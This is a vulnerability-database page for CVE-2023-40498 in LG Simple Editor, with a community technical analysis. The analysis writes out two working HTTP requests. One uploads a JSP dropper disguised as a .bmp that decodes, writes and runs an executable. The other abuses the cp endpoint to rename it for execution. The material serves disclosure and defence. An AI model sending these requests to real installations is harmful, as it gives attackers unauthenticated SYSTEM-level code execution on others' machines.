Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
2

CVE-2023-40498

Disclosure Date: May 03, 2024
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

LG Simple Editor cp Command Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the cp command implemented in the makeDetailContent method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
. Was ZDI-CAN-19925.

Add Assessment

1
Ratings
Technical Analysis

LG Simple Editor is a solution that enables you to create and distribute content easily and quickly by using templates. LG Simple Editor is recommended for small businesses and sports bars which require simple content display or play-on-air via their signage. It enables easy new content creation by simplifying processes, and immediate playback on signage. Version prior to v3.21 suffer from two vulnerability specifically a broken access control and directory traversal that result in remote code execution in the context of NT AUTHORITY \SYSTEM

Vulnerable Versions

  • <= v3.21

Attacker Value & Exploitability

This exploit scores 5/5 in both categories primarily due to the fact the exploit provides unauthenticated remote code execution in the context of NT AUTHORITY \SYSTEM. Other contributing factors are of course how it is vulnerable straight out of the box and how easy it is to exploit. It might not be as common in enterprise by nature of the product description above however I don’t think that should affect either of these ratings.

How it works

First start by exploiting the broken access control vulnerability (which at the time of writing does not have a CVE – it could be considered a feature). The endpoint /simpleeditor/imageManager/uploadImage.do will allow you to upload a file with the .bmp file extension of which the contents are not inspected thoroughly. In order to obtain remote code execution we can upload a malicious .jsp under the disguise of a .bmp file extension. The following .jsp payload (used by the metasploit module windows/http/lg_simple_editor_rce) first base64 decodes the raw bytes of a malicious executable, then writes the executable to a file, then runs the executable with Runtime.getRuntime().exe.

POST /simpleeditor/imageManager/uploadImage.do HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: multipart/form-data; boundary=---------------------------761960311879735919883545313592
Content-Length: 99894

-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile"; filename="SyouN.bmp"
Content-Type: image/bmp
Content-Transfer-Encoding: binary

    <%@page import="java.io.*" %>    <%@page import="sun.misc.BASE64Decoder"%>    <%    try {      String cXaet = "

    <<binary payload base64 encoded>> 

    ";      BASE64Decoder dHhlo = new BASE64Decoder();      byte[] aHZZzH = dHhlo.decodeBuffer(cXaet.toString());      File eplNCoYo = File.createTempFile("OXvZEnQ", ".exe");      String fbhUvbGUQZA = eplNCoYo.getAbsolutePath();      BufferedOutputStream bghnAwAsukY =        new BufferedOutputStream(new FileOutputStream(fbhUvbGUQZA));      bghnAwAsukY.write(aHZZzH);      bghnAwAsukY.close();      Process eVsTEolPjY = Runtime.getRuntime().exec(fbhUvbGUQZA);    } catch (Exception e) {    }    %>
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadPath"

/
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile_x"

-1000
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile_y"

-1000
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile_width"

1920
-----------------------------761960311879735919883545313592
Content-Disposition: form-data; name="uploadFile_height"

1080
-----------------------------761960311879735919883545313592--

Now we can exploit the vulnerability that is tied to CVE-2023-40498. The /simpleeditor/fileSystem/makeDetailContent.do endpoint allows unauthenticated users to copy files on the filesystem with no directory traversal mitigations in place. So we can copy our malicious .bmp file to a file with the extension .jsp so we can execute it (ezpz some might say). This can be achieved by issuing the following POST request:

POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
X-Requested-With: XMLHttpRequest
Accept: application/json
Content-Type: application/json
Content-Length: 86

{"command":"cp","option":"-f","srcPath":"/SyouN_original.bmp","destPath":"/SyouN.jsp"}

The payload we uploaded is now in an executable file format in a directory accessible without authentication.

CVSS V3 Severity and Metrics
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Vector:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown

General Information

Vendors

  • LG

Products

  • Simple Editor

Additional Info

Technical Analysis